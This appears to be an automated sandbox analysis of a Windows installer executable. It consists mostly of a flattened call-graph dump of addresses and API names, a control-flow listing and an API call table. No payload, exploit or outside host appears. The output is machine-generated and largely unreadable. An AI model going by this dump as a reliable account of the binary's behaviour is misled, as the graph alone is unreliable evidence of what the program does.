4038b2 3504->3591 3507->3495 3507->3502 3511 403599 3508->3511 3517 4035e0 3511->3517 3518 403645 lstrcatW lstrcmpiW 3511->3518 3512 403725 3515 4037a8 ExitProcess 3512->3515 3519 406252 3 API calls 3512->3519 3513 40362f 3514 4056c4 MessageBoxIndirectW 3513->3514 3516 40363d ExitProcess 3514->3516 3521 405a3b 18 API calls 3517->3521 3518->3502 3522 403661 CreateDirectoryW SetCurrentDirectoryW 3518->3522 3523 403734 3519->3523 3524 4035ec 3521->3524 3525 403684 3522->3525 3526 403679 3522->3526 3527 406252 3 API calls 3523->3527 3524->3502 3646 405ee8 lstrcpynW 3524->3646 3658 405ee8 lstrcpynW 3525->3658 3657 405ee8 lstrcpynW 3526->3657 3530 40373d 3527->3530 3532 406252 3 API calls 3530->3532 3533 403746 3532->3533 3535 403794 ExitWindowsEx 3533->3535 3540 403754 GetCurrentProcess 3533->3540 3534 4035fb 3647 405ee8 lstrcpynW 3534->3647 3535->3515 3538 4037a1 3535->3538 3537 405f0a 18 API calls 3539 4036c3 DeleteFileW 3537->3539 3541 40140b 2 API calls 3538->3541 3542 4036d0 CopyFileW 3539->3542 3548 403692 3539->3548 3544 403764 3540->3544 3541->3515 3542->3548 3543 403719 3545 405d82 40 API calls 3543->3545 3544->3535 3545->3502 3546 405d82 40 API calls 3546->3548 3547 405f0a 18 API calls 3547->3548 3548->3537 3548->3543 3548->3546 3548->3547 3549 405663 2 API calls 3548->3549 3550 403704 CloseHandle 3548->3550 3549->3548 3550->3548 3551->3482 3552->3484 3554 40617c 5 API calls 3553->3554 3555 403330 3554->3555 3556 40333a 3555->3556 3557 405933 3 API calls 3555->3557 3556->3492 3558 403342 CreateDirectoryW 3557->3558 3659 405b83 3558->3659 3663 405b54 GetFileAttributesW CreateFileW 3561->3663 3563 402dfd 3590 402e0a 3563->3590 3664 405ee8 lstrcpynW 3563->3664 3565 402e20 3566 40597f 2 API calls 3565->3566 3567 402e26 3566->3567 3665 405ee8 lstrcpynW 3567->3665 3569 402e31 GetFileSize 3570 402f32 3569->3570 3572 402e48 3569->3572 3571 402d18 33 API calls 3570->3571 3574 402f39 3571->3574 3572->3570 3573 4032f7 ReadFile 3572->3573 3575 402fcd 3572->3575 3581 402d18 33 API calls 3572->3581 3572->3590 3573->3572 3576 402f75 GlobalAlloc 3574->3576 3574->3590 3667 40330d SetFilePointer 3574->3667 3578 402d18 33 API calls 3575->3578 3577 402f8c 3576->3577 3582 405b83 2 API calls 3577->3582 3578->3590 3580 402f56 3583 4032f7 ReadFile 3580->3583 3581->3572 3585 402f9d CreateFileW 3582->3585 3584 402f61 3583->3584 3584->3576 3584->3590 3586 402fd7 3585->3586 3585->3590 3666 40330d SetFilePointer 3586->3666 3588 402fe5 3589 403060 46 API calls 3588->3589 3589->3590 3590->3499 3590->3590 3592 406252 3 API calls 3591->3592 3593 4038c6 3592->3593 3594 4038cc 3593->3594 3595 4038de 3593->3595 3677 405e2f wsprintfW 3594->3677 3596 405db5 3 API calls 3595->3596 3597 40390e 3596->3597 3599 40392d lstrcatW 3597->3599 3601 405db5 3 API calls 3597->3601 3600 4038dc 3599->3600 3668 403b88 3600->3668 3601->3599 3604 405a3b 18 API calls 3605 40395f 3604->3605 3606 4039f3 3605->3606 3609 405db5 3 API calls 3605->3609 3607 405a3b 18 API calls 3606->3607 3608 4039f9 3607->3608 3611 403a09 LoadImageW 3608->3611 3612 405f0a 18 API calls 3608->3612 3610 403991 3609->3610 3610->3606 3615 4039b2 lstrlenW 3610->3615 3619 405960 CharNextW 3610->3619 3613 403a30 RegisterClassW 3611->3613 3614 403aaf 3611->3614 3612->3611 3616 403a66 SystemParametersInfoW CreateWindowExW 3613->3616 3617 403ab9 3613->3617 3618 40140b 2 API calls 3614->3618 3620 4039c0 lstrcmpiW 3615->3620 3621 4039e6 3615->3621 3616->3614 3617->3502 3622 403ab5 3618->3622 3623 4039af 3619->3623 3620->3621 3624 4039d0 GetFileAttributesW 3620->3624 3625 405933 3 API calls 3621->3625 3622->3617 3627 403b88 19 API calls 3622->3627 3623->3615 3626 4039dc 3624->3626 3628 4039ec 3625->3628 3626->3621 3629 40597f 2 API calls 3626->3629 3630 403ac6 3627->3630 3678 405ee8 lstrcpynW 3628->3678 3629->3621 3632 403ad2 ShowWindow LoadLibraryW 3630->3632 3633 403b55 3630->3633 3635 403af1 LoadLibraryW 3632->3635 3636 403af8 GetClassInfoW 3632->3636 3634 405265 5 API calls 3633->3634 3639 403b5b 3634->3639 3635->3636 3637 403b22 DialogBoxParamW 3636->3637 3638 403b0c GetClassInfoW RegisterClassW 3636->3638 3640 40140b 2 API calls 3637->3640 3638->3637 3641 403b77 3639->3641 3642 403b5f 3639->3642 3640->3617 3643 40140b 2 API calls 3641->3643 3642->3617 3644 40140b 2 API calls 3642->3644 3643->3617 3644->3617 3645->3490 3646->3534 3647->3504 3649 4037d1 CloseHandle 3648->3649 3650 4037db 3648->3650 3649->3650 3651 4037e5 CloseHandle 3650->3651 3652 4037ef 3650->3652 3651->3652 3680 40381d 3652->3680 3655 405770 71 API calls 3656 40361f OleUninitialize 3655->3656 3656->3512 3656->3513 3657->3525 3658->3548 3660 405b90 GetTickCount GetTempFileNameW 3659->3660 3661 405bc6 3660->3661 3662 403356 3660->3662 3661->3660 3661->3662 3662->3492 3663->3563 3664->3565 3665->3569 3666->3588 3667->3580 3669 403b9c 3668->3669 3679 405e2f wsprintfW 3669->3679 3671 403c0d 3672 405f0a 18 API calls 3671->3672 3673 403c19 SetWindowTextW 3672->3673 3674 40393d 3673->3674 3675 403c35 3673->3675 3674->3604 3675->3674 3676 405f0a 18 API calls 3675->3676 3676->3675 3677->3600 3678->3606 3679->3671 3681 40382b 3680->3681 3682 403830 FreeLibrary GlobalFree 3681->3682 3683 4037f4 3681->3683 3682->3682 3682->3683 3683->3655 3955 40155b 3956 40296b 3955->3956 3959 405e2f wsprintfW 3956->3959 3958 402970 3959->3958 3967 4023de 3968 402c42 19 API calls 3967->3968 3969 4023e8 3968->3969 3970 402b38 18 API calls 3969->3970 3971 4023f1 3970->3971 3972 4023fc RegQueryValueExW 3971->3972 3976 402791 3971->3976 3973 402422 RegCloseKey 3972->3973 3974 40241c 3972->3974 3973->3976 3974->3973 3978 405e2f wsprintfW 3974->3978 3978->3973 3979 401ce5 GetDlgItem GetClientRect 3980 402b38 18 API calls 3979->3980 3981 401d17 LoadImageW SendMessageW 3980->3981 3982 401d35 DeleteObject 3981->3982 3983 4029c5 3981->3983 3982->3983 3984 40206a 3985 402b38 18 API calls 3984->3985 3986 402071 3985->3986 3987 402b38 18 API calls 3986->3987 3988 40207b 3987->3988 3989 402b38 18 API calls 3988->3989 3990 402084 3989->3990 3991 402b38 18 API calls 3990->3991 3992 40208e 3991->3992 3993 402b38 18 API calls 3992->3993 3994 402098 3993->3994 3995 4020ac CoCreateInstance 3994->3995 3996 402b38 18 API calls 3994->3996 3999 4020cb 3995->3999 3996->3995 3997 401423 25 API calls 3998 402195 3997->3998 3999->3997 3999->3998 4000 40156b 4001 401584 4000->4001 4002 40157b ShowWindow 4000->4002 4003 401592 ShowWindow 4001->4003 4004 4029c5 4001->4004 4002->4001 4003->4004 4005 4024ec 4006 4024f1 4005->4006 4007 40250a 4005->4007 4008 402b1b 18 API calls 4006->4008 4009 402510 4007->4009 4010 40253c 4007->4010 4013 4024f8 4008->4013 4011 402b38 18 API calls 4009->4011 4012 402b38 18 API calls 4010->4012 4014 402517 WideCharToMultiByte lstrlenA 4011->4014 4015 402543 lstrlenW 4012->4015 4016 402791 4013->4016 4017 402565 WriteFile 4013->4017 4014->4013 4015->4013 4017->4016 4018 40276e 4019 402b38 18 API calls 4018->4019 4020 402775 FindFirstFileW 4019->4020 4021 40279d 4020->4021 4025 402788 4020->4025 4023 4027a6 4021->4023 4026 405e2f wsprintfW 4021->4026 4027 405ee8 lstrcpynW 4023->4027 4026->4023 4027->4025 4028 4018ef 4029 401926 4028->4029 4030 402b38 18 API calls 4029->4030 4031 40192b 4030->4031 4032 405770 71 API calls 4031->4032 4033 401934 4032->4033 4034 403870 4035 40387b 4034->4035 4036 403882 GlobalAlloc 4035->4036 4037 40387f 4035->4037 4036->4037 4038 402571 4039 402b1b 18 API calls 4038->4039 4043 402580 4039->4043 4040 40269e 4041 4025c6 ReadFile 4041->4040 4041->4043 4042 405bd7 ReadFile 4042->4043 4043->4040 4043->4041 4043->4042 4044 4026a0 4043->4044 4045 402606 MultiByteToWideChar 4043->4045 4047 40262c SetFilePointer MultiByteToWideChar 4043->4047 4048 4026b1 4043->4048 4050 405e2f wsprintfW 4044->4050 4045->4043 4047->4043 4048->4040 4049 4026d2 SetFilePointer 4048->4049 4049->4040 4050->4040 4051 4014f1 SetForegroundWindow 4052 4029c5 4051->4052 4060 4018f2 4061 402b38 18 API calls 4060->4061 4062 4018f9 4061->4062 4063 4056c4 MessageBoxIndirectW 4062->4063 4064 401902 4063->4064 4072 401df3 4073 402b38 18 API calls 4072->4073 4074 401df9 4073->4074 4075 402b38 18 API calls 4074->4075 4076 401e02 4075->4076 4077 402b38 18 API calls 4076->4077 4078 401e0b 4077->4078 4079 402b38 18 API calls 4078->4079 4080 401e14 4079->4080 4081 401423 25 API calls 4080->4081 4082 401e1b ShellExecuteW 4081->4082 4083 401e4c 4082->4083 4089 4026f7 4090 4026fe 4089->4090 4092 402970 4089->4092 4091 402b1b 18 API calls 4090->4091 4093 402709 4091->4093 4094 402710 SetFilePointer 4093->4094 4094->4092 4095 402720 4094->4095 4097 405e2f wsprintfW 4095->4097 4097->4092 4105 40427b lstrlenW 4106 40429a 4105->4106 4107 40429c WideCharToMultiByte 4105->4107 4106->4107 4108 402c7d 4109 402ca8 4108->4109 4110 402c8f SetTimer 4108->4110 4111 402cf6 4109->4111 4112 402cfc MulDiv 4109->4112 4110->4109 4113 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4112->4113 4113->4111 4115 4014ff 4116 401507 4115->4116 4118 40151a 4115->4118 4117 402b1b 18 API calls 4116->4117 4117->4118 4119 401000 4120 401037 BeginPaint GetClientRect 4119->4120 4121 40100c DefWindowProcW 4119->4121 4123 4010f3 4120->4123 4124 401179 4121->4124 4125 401073 CreateBrushIndirect FillRect DeleteObject 4123->4125 4126 4010fc 4123->4126 4125->4123 4127 401102 CreateFontIndirectW 4126->4127 4128 401167 EndPaint 4126->4128 4127->4128 4129 401112 6 API calls 4127->4129 4128->4124 4129->4128 4130 401a00 4131 402b38 18 API calls 4130->4131 4132 401a09 ExpandEnvironmentStringsW 4131->4132 4133 401a1d 4132->4133 4135 401a30 4132->4135 4134 401a22 lstrcmpW 4133->4134 4133->4135 4134->4135 4136 401b01 4137 402b38 18 API calls 4136->4137 4138 401b08 4137->4138 4139 402b1b 18 API calls 4138->4139 4140 401b11 wsprintfW 4139->4140 4141 4029c5 4140->4141 4142 404581 4143 404591 4142->4143 4144 4045b7 4142->4144 4145 40412d 19 API calls 4143->4145 4146 404194 8 API calls 4144->4146 4147 40459e SetDlgItemTextW 4145->4147 4148 4045c3 4146->4148 4147->4144 4149 405106 4150 405116 4149->4150 4151 40512a 4149->4151 4152 405173 4150->4152 4153 40511c 4150->4153 4154 405132 IsWindowVisible 4151->4154 4160 405149 4151->4160 4155 405178 CallWindowProcW 4152->4155 4156 404179 SendMessageW 4153->4156 4154->4152 4157 40513f 4154->4157 4158 405126 4155->4158 4156->4158 4162 404a5c SendMessageW 4157->4162 4160->4155 4167 404adc 4160->4167 4163 404abb SendMessageW 4162->4163 4164 404a7f GetMessagePos ScreenToClient SendMessageW 4162->4164 4165 404ab3 4163->4165 4164->4165 4166 404ab8 4164->4166 4165->4160 4166->4163 4176 405ee8 lstrcpynW 4167->4176 4169 404aef 4177 405e2f wsprintfW 4169->4177 4171 404af9 4172 40140b 2 API calls 4171->4172 4173 404b02 4172->4173 4178 405ee8 lstrcpynW 4173->4178 4175 404b09 4175->4152 4176->4169 4177->4171 4178->4175 4179 401f08 4180 402b38 18 API calls 4179->4180 4181 401f0f GetFileVersionInfoSizeW 4180->4181 4182 401f8c 4181->4182 4183 401f36 GlobalAlloc 4181->4183 4183->4182 4184 401f4a GetFileVersionInfoW 4183->4184 4184->4182 4185 401f59 VerQueryValueW 4184->4185 4185->4182 4186 401f72 4185->4186 4190 405e2f wsprintfW 4186->4190 4188 401f7e 4191 405e2f wsprintfW 4188->4191 4190->4188 4191->4182 4199 404b0e GetDlgItem GetDlgItem 4200 404b60 7 API calls 4199->4200 4207 404d79 4199->4207 4201 404c03 DeleteObject 4200->4201 4202 404bf6 SendMessageW 4200->4202 4203 404c0c 4201->4203 4202->4201 4204 404c43 4203->4204 4206 405f0a 18 API calls 4203->4206 4208 40412d 19 API calls 4204->4208 4205 404e5d 4209 404f09 4205->4209 4218 404eb6 SendMessageW 4205->4218 4242 404d6c 4205->4242 4210 404c25 SendMessageW SendMessageW 4206->4210 4207->4205 4216 404a5c 5 API calls 4207->4216 4228 404dea 4207->4228 4213 404c57 4208->4213 4211 404f13 SendMessageW 4209->4211 4212 404f1b 4209->4212 4210->4203 4211->4212 4220 404f34 4212->4220 4221 404f2d ImageList_Destroy 4212->4221 4229 404f44 4212->4229 4217 40412d 19 API calls 4213->4217 4214 404194 8 API calls 4219 4050ff 4214->4219 4215 404e4f SendMessageW 4215->4205 4216->4228 4233 404c65 4217->4233 4223 404ecb SendMessageW 4218->4223 4218->4242 4224 404f3d GlobalFree 4220->4224 4220->4229 4221->4220 4222 4050b3 4230 4050c5 ShowWindow GetDlgItem ShowWindow 4222->4230 4222->4242 4226 404ede 4223->4226 4224->4229 4225 404d3a GetWindowLongW SetWindowLongW 4227 404d53 4225->4227 4234 404eef SendMessageW 4226->4234 4231 404d71 4227->4231 4232 404d59 ShowWindow 4227->4232 4228->4205 4228->4215 4229->4222 4241 404adc 4 API calls 4229->4241 4244 404f7f 4229->4244 4230->4242 4251 404162 SendMessageW 4231->4251 4250 404162 SendMessageW 4232->4250 4233->4225 4235 404d34 4233->4235 4238 404cb5 SendMessageW 4233->4238 4239 404cf1 SendMessageW 4233->4239 4240 404d02 SendMessageW 4233->4240 4234->4209 4235->4225 4235->4227 4238->4233 4239->4233 4240->4233 4241->4244 4242->4214 4243 405089 InvalidateRect 4243->4222 4245 40509f 4243->4245 4246 404fad SendMessageW 4244->4246 4247 404fc3 4244->4247 4248 404976 21 API calls 4245->4248 4246->4247 4247->4243 4249 405037 SendMessageW SendMessageW 4247->4249 4248->4222 4249->4247 4250->4242 4251->4207 4252 404910 4253 404920 4252->4253 4254 40493c 4252->4254 4263 4056a8 GetDlgItemTextW 4253->4263 4256 404942 SHGetPathFromIDListW 4254->4256 4257 40496f 4254->4257 4259 404959 SendMessageW 4256->4259 4260 404952 4256->4260 4258 40492d SendMessageW 4258->4254 4259->4257 4262 40140b 2 API calls 4260->4262 4262->4259 4263->4258 4264 401491 4265 405192 25 API calls 4264->4265 4266 401498 4265->4266 4267 402293 4268 402b38 18 API calls 4267->4268 4269 4022a2 4268->4269 4270 402b38 18 API calls 4269->4270 4271 4022ab 4270->4271 4272 402b38 18 API calls 4271->4272 4273 4022b5 GetPrivateProfileStringW 4272->4273 4274 401718 4275 402b38 18 API calls 4274->4275 4276 40171f SearchPathW 4275->4276 4277 40173a 4276->4277 4278 401f98 4279 401faa 4278->4279 4289 40205c 4278->4289 4280 402b38 18 API calls 4279->4280 4282 401fb1 4280->4282 4281 401423 25 API calls 4287 402195 4281->4287 4283 402b38 18 API calls 4282->4283 4284 401fba 4283->4284 4285 401fd0 LoadLibraryExW 4284->4285 4286 401fc2 GetModuleHandleW 4284->4286 4288 401fe1 4285->4288 4285->4289 4286->4285 4286->4288 4298 4062be WideCharToMultiByte 4288->4298 4289->4281 4292 401ff2 4295 401423 25 API calls 4292->4295 4296 402002 4292->4296 4293 40202b 4294 405192 25 API calls 4293->4294 4294->4296 4295->4296 4296->4287 4297 40204e FreeLibrary 4296->4297 4297->4287 4299 4062e8 GetProcAddress 4298->4299 4300 401fec 4298->4300 4299->4300 4300->4292 4300->4293 3706 40159b 3707 402b38 18 API calls 3706->3707 3708 4015a2 SetFileAttributesW 3707->3708 3709 4015b4 3708->3709 4301 40149e 4302 40223c 4301->4302 4303 4014ac PostQuitMessage 4301->4303 4303->4302 4304 40219e 4305 402b38 18 API calls 4304->4305 4306 4021a4 4305->4306 4307 402b38 18 API calls 4306->4307 4308 4021ad 4307->4308 4309 402b38 18 API calls 4308->4309 4310 4021b6 4309->4310 4311 40622b 2 API calls 4310->4311 4312 4021bf 4311->4312 4313 4021d0 lstrlenW lstrlenW 4312->4313 4314 4021c3 4312->4314 4316 405192 25 API calls 4313->4316 4315 405192 25 API calls 4314->4315 4317 4021cb 4314->4317 4315->4317 4318 40220e SHFileOperationW 4316->4318 4318->4314 4318->4317 4319 4029a0 SendMessageW 4320 4029c5 4319->4320 4321 4029ba InvalidateRect 4319->4321 4321->4320 4329 401b22 4330 401b73 4329->4330 4331 401b2f 4329->4331 4333 401b78 4330->4333 4334 401b9d GlobalAlloc 4330->4334 4332 402229 4331->4332 4338 401b46 4331->4338 4335 405f0a 18 API calls 4332->4335 4343 401bb8 4333->4343 4350 405ee8 lstrcpynW 4333->4350 4336 405f0a 18 API calls 4334->4336 4337 402236 4335->4337 4336->4343 4344 4056c4 MessageBoxIndirectW 4337->4344 4348 405ee8 lstrcpynW 4338->4348 4341 401b8a GlobalFree 4341->4343 4342 401b55 4349 405ee8 lstrcpynW 4342->4349 4344->4343 4346 401b64 4351 405ee8 lstrcpynW 4346->4351 4348->4342 4349->4346 4350->4341 4351->4343 4352 402222 4353 402229 4352->4353 4356 40223c 4352->4356 4354 405f0a 18 API calls 4353->4354 4355 402236 4354->4355 4357 4056c4 MessageBoxIndirectW 4355->4357 4357->4356 3274 401924 3275 401926 3274->3275 3276 402b38 18 API calls 3275->3276 3277 40192b 3276->3277 3280 405770 3277->3280 3319 405a3b 3280->3319 3283 405798 DeleteFileW 3290 401934 3283->3290 3285 4057af 3286 4058cf 3285->3286 3333 405ee8 lstrcpynW 3285->3333 3286->3290 3293 40622b 2 API calls 3286->3293 3287 4057d5 3288 4057e8 3287->3288 3289 4057db lstrcatW 3287->3289 3334 40597f lstrlenW 3288->3334 3291 4057ee 3289->3291 3294 4057fe lstrcatW 3291->3294 3296 405809 lstrlenW FindFirstFileW 3291->3296 3295 4058f4 3293->3295 3294->3296 3295->3290 3297 4058f8 3295->3297 3296->3286 3305 40582b 3296->3305 3298 405933 3 API calls 3297->3298 3299 4058fe 3298->3299 3301 405728 5 API calls 3299->3301 3300 4058b2 FindNextFileW 3303 4058c8 FindClose 3300->3303 3300->3305 3304 40590a 3301->3304 3303->3286 3306 405924 3304->3306 3307 40590e 3304->3307 3305->3300 3314 405873 3305->3314 3338 405ee8 lstrcpynW 3305->3338 3309 405192 25 API calls 3306->3309 3307->3290 3310 405192 25 API calls 3307->3310 3309->3290 3312 40591b 3310->3312 3311 405770 64 API calls 3311->3314 3313 405d82 40 API calls 3312->3313 3316 405922 3313->3316 3314->3300 3314->3311 3315 405192 25 API calls 3314->3315 3317 405192 25 API calls 3314->3317 3339 405728 3314->3339 3347 405d82 3314->3347 3315->3300 3316->3290 3317->3314 3352 405ee8 lstrcpynW 3319->3352 3321 405a4c 3353 4059de CharNextW CharNextW 3321->3353 3324 405790 3324->3283 3324->3285 3325 40617c 5 API calls 3328 405a62 3325->3328 3326 405a93 lstrlenW 3327 405a9e 3326->3327 3326->3328 3330 405933 3 API calls 3327->3330 3328->3324 3328->3326 3329 40622b 2 API calls 3328->3329 3332 40597f 2 API calls 3328->3332 3329->3328 3331 405aa3 GetFileAttributesW 3330->3331 3331->3324 3332->3326 3333->3287 3335 40598d 3334->3335 3336 405993 CharPrevW 3335->3336 3337 40599f 3335->3337 3336->3335 3336->3337 3337->3291 3338->3305 3340 405b2f 2 API calls 3339->3340 3341 405734 3340->3341 3342 405743 RemoveDirectoryW 3341->3342 3343 40574b DeleteFileW 3341->3343 3345 405755 3341->3345 3344 405751 3342->3344 3343->3344 3344->3345 3346 405761 SetFileAttributesW 3344->3346 3345->3314 3346->3345 3348 406252 3 API calls 3347->3348 3349 405d89 3348->3349 3351 405daa 3349->3351 3359 405c06 lstrcpyW 3349->3359 3351->3314 3352->3321 3354 4059fb 3353->3354 3358 405a0d 3353->3358 3356 405a08 CharNextW 3354->3356 3354->3358 3355 405a31 3355->3324 3355->3325 3356->3355 3357 405960 CharNextW 3357->3358 3358->3355 3358->3357 3360 405c55 GetShortPathNameW 3359->3360 3361 405c2f 3359->3361 3363 405c6a 3360->3363 3364 405d7c 3360->3364 3384 405b54 GetFileAttributesW CreateFileW 3361->3384 3363->3364 3366 405c72 wsprintfA 3363->3366 3364->3351 3365 405c39 CloseHandle GetShortPathNameW 3365->3364 3367 405c4d 3365->3367 3368 405f0a 18 API calls 3366->3368 3367->3360 3367->3364 3369 405c9a 3368->3369 3385 405b54 GetFileAttributesW CreateFileW 3369->3385 3371 405ca7 3371->3364 3372 405cb6 GetFileSize GlobalAlloc 3371->3372 3373 405d75 CloseHandle 3372->3373 3374 405cd8 3372->3374 3373->3364 3375 405bd7 ReadFile 3374->3375 3376 405ce0 3375->3376 3376->3373 3386 405ab9 lstrlenA 3376->3386 3379 405cf7 lstrcpyA 3382 405d19 3379->3382 3380 405d0b 3381 405ab9 4 API calls 3380->3381 3381->3382 3383 405d50 SetFilePointer WriteFile GlobalFree 3382->3383 3383->3373 3384->3365 3385->3371 3387 405afa lstrlenA 3386->3387 3388 405b02 3387->3388 3389 405ad3 lstrcmpiA 3387->3389 3388->3379 3388->3380 3389->3388 3390 405af1 CharNextA 3389->3390 3390->3387 4358 402727 4359 4029c5 4358->4359 4360 40272e 4358->4360 4361 402734 FindClose 4360->4361 4361->4359 4362 401cab 4363 402b1b 18 API calls 4362->4363 4364 401cb2 4363->4364 4365 402b1b 18 API calls 4364->4365 4366 401cba GetDlgItem 4365->4366 4367 4024e6 4366->4367 3710 40232f 3711 402335 3710->3711 3712 402b38 18 API calls 3711->3712 3713 402347 3712->3713 3714 402b38 18 API calls 3713->3714 3715 402351 RegCreateKeyExW 3714->3715 3716 402791 3715->3716 3717 40237b 3715->3717 3718 402396 3717->3718 3719 402b38 18 API calls 3717->3719 3720 4023a2 3718->3720 3722 402b1b 18 API calls 3718->3722 3721 40238c lstrlenW 3719->3721 3723 4023bd RegSetValueExW 3720->3723 3724 403060 46 API calls 3720->3724 3721->3718 3722->3720 3725 4023d3 RegCloseKey 3723->3725 3724->3723 3725->3716 4368 4016af 4369 402b38 18 API calls 4368->4369 4370 4016b5 GetFullPathNameW 4369->4370 4371 4016cf 4370->4371 4377 4016f1 4370->4377 4374 40622b 2 API calls 4371->4374 4371->4377 4372 4029c5 4373 401706 GetShortPathNameW 4373->4372 4375 4016e1 4374->4375 4375->4377 4378 405ee8 lstrcpynW 4375->4378 4377->4372 4377->4373 4378->4377 4379 406c30 4382 4063c1 4379->4382 4380 406442 GlobalFree 4381 40644b GlobalAlloc 4380->4381 4381->4382 4383 406d2c 4381->4383 4382->4380 4382->4381 4382->4382 4382->4383 4384 4064c2 GlobalAlloc 4382->4384 4385 4064b9 GlobalFree 4382->4385 4384->4382 4384->4383 4385->4384 4386 4027b3 4387 402b38 18 API calls 4386->4387 4388 4027c1 4387->4388 4389 4027d7 4388->4389 4390 402b38 18 API calls 4388->4390 4391 405b2f 2 API calls 4389->4391 4390->4389 4392 4027dd 4391->4392 4412 405b54 GetFileAttributesW CreateFileW 4392->4412 4394 4027ea 4395 402893 4394->4395 4396 4027f6 GlobalAlloc 4394->4396 4397 40289b DeleteFileW 4395->4397 4398 4028ae 4395->4398 4399 40288a CloseHandle 4396->4399 4400 40280f 4396->4400 4397->4398 4399->4395 4413 40330d SetFilePointer 4400->4413 4402 402815 4403 4032f7 ReadFile 4402->4403 4404 40281e GlobalAlloc 4403->4404 4405 402862 WriteFile GlobalFree 4404->4405 4406 40282e 4404->4406 4408 403060 46 API calls 4405->4408 4407 403060 46 API calls 4406->4407 4411 40283b 4407->4411 4409 402887 4408->4409 4409->4399 4410 402859 GlobalFree 4410->4405 4411->4410 4412->4394 4413->4402 4414 4028b4 4415 402b1b 18 API calls 4414->4415 4416 4028ba 4415->4416 4417 4028f6 4416->4417 4418 4028dd 4416->4418 4419 402791 4416->4419 4421 402900 4417->4421 4422 40290c 4417->4422 4420 4028e2 4418->4420 4427 4028f3 4418->4427 4428 405ee8 lstrcpynW 4420->4428 4424 402b1b 18 API calls 4421->4424 4423 405f0a 18 API calls 4422->4423 4423->4427 4424->4427 4427->4419 4429 405e2f wsprintfW 4427->4429 4428->4419 4429->4419 4430 4014b8 4431 4014be 4430->4431 4432 401389 2 API calls 4431->4432 4433 4014c6 4432->4433 3684 4015b9 3685 402b38 18 API calls 3684->3685 3686 4015c0 3685->3686 3687 4059de 4 API calls 3686->3687 3697 4015c9 3687->3697 3688 401614 3689 401646 3688->3689 3690 401619 3688->3690 3694 401423 25 API calls 3689->3694 3702 401423 3690->3702 3691 405960 CharNextW 3693 4015d7 CreateDirectoryW 3691->3693 3696 4015ed GetLastError 3693->3696 3693->3697 3701 40163e 3694->3701 3696->3697 3698 4015fa GetFileAttributesW 3696->3698 3697->3688 3697->3691 3698->3697 3700 40162d SetCurrentDirectoryW 3700->3701 3703 405192 25 API calls 3702->3703 3704 401431 3703->3704 3705 405ee8 lstrcpynW 3704->3705 3705->3700 4434 401939 4435 402b38 18 API calls 4434->4435 4436 401940 lstrlenW 4435->4436 4437 4024e6 4436->4437 4438 402939 4439 402b1b 18 API calls 4438->4439 4440 40293f 4439->4440 4441 402972 4440->4441 4442 40294d 4440->4442 4444 402791 4440->4444 4443 405f0a 18 API calls 4441->4443 4441->4444 4442->4444 4446 405e2f wsprintfW 4442->4446 4443->4444 4446->4444 4447 40653d 4449 4063c1 4447->4449 4448 406d2c 4449->4448 4450 406442 GlobalFree 4449->4450 4451 40644b GlobalAlloc 4449->4451 4452 4064c2 GlobalAlloc 4449->4452 4453 4064b9 GlobalFree 4449->4453 4450->4451 4451->4448 4451->4449 4452->4448 4452->4449 4453->4452 4454 40173f 4455 402b38 18 API calls 4454->4455 4456 401746 4455->4456 4457 405b83 2 API calls 4456->4457 4458 40174d 4457->4458 4458->4458

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 17 403426-40342a 15->17 18 40342b-40342f 15->18 26 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->26 27 40356a-403584 DeleteFileW call 402dba 16->27 17->18 20 403435-40343b 18->20 21 4034c9-4034d4 call 405960 18->21 24 403455-40346c 20->24 25 40343d-403444 20->25 21->11 37 4034d6-4034d7 21->37 33 40349a-4034b0 24->33 34 40346e-403484 24->34 31 403446-403449 25->31 32 40344b 25->32 26->27 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 26->42 44 40361a-403629 call 4037c0 OleUninitialize 27->44 45 40358a-403590 27->45 31->24 31->32 32->24 33->21 36 4034b2-4034c7 33->36 34->33 39 403486-40348e 34->39 36->21 43 4034e6-4034f3 call 405ee8 36->43 37->11 40 403490-403493 39->40 41 403495 39->41 40->33 40->41 41->33 42->27 42->44 43->16 57 403725-40372b 44->57 58 40362f-40363f call 4056c4 ExitProcess 44->58 47 403592-40359d call 405960 45->47 48 40360a-403611 call 4038b2 45->48 62 4035d4-4035de 47->62 63 40359f-4035b0 47->63 56 403616 48->56 56->44 60 4037a8-4037b0 57->60 61 40372d-40374a call 406252 * 3 57->61 69 4037b2 60->69 70 4037b6-4037ba ExitProcess 60->70 90 403794-40379f ExitWindowsEx 61->90 91 40374c-40374e 61->91 65 4035e0-4035ee call 405a3b 62->65 66 403645-40365f lstrcatW lstrcmpiW 62->66 68 4035b2-4035b4 63->68 65->44 80 4035f0-403606 call 405ee8 * 2 65->80 66->44 72 403661-403677 CreateDirectoryW SetCurrentDirectoryW 66->72 74 4035b6-4035cc 68->74 75 4035ce-4035d2 68->75 69->70 77 403684-4036ad call 405ee8 72->77 78 403679-40367f call 405ee8 72->78 74->62 74->75 75->62 75->68 89 4036b2-4036ce call 405f0a DeleteFileW 77->89 78->77 80->48 100 4036d0-4036e0 CopyFileW 89->100 101 40370f-403717 89->101 90->60 96 4037a1-4037a3 call 40140b 90->96 91->90 94 403750-403752 91->94 94->90 98 403754-403766 GetCurrentProcess 94->98 96->60 98->90 107 403768-40378a 98->107 100->101 103 4036e2-403702 call 405d82 call 405f0a call 405663 100->103 101->89 102 403719-403720 call 405d82 101->102 102->44 103->101 115 403704-40370b CloseHandle 103->115 107->90 115->101
                                              APIs
                                              • #17.COMCTL32 ref: 00403377
                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                                              • OleInitialize.OLE32(00000000), ref: 00403389
                                                • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
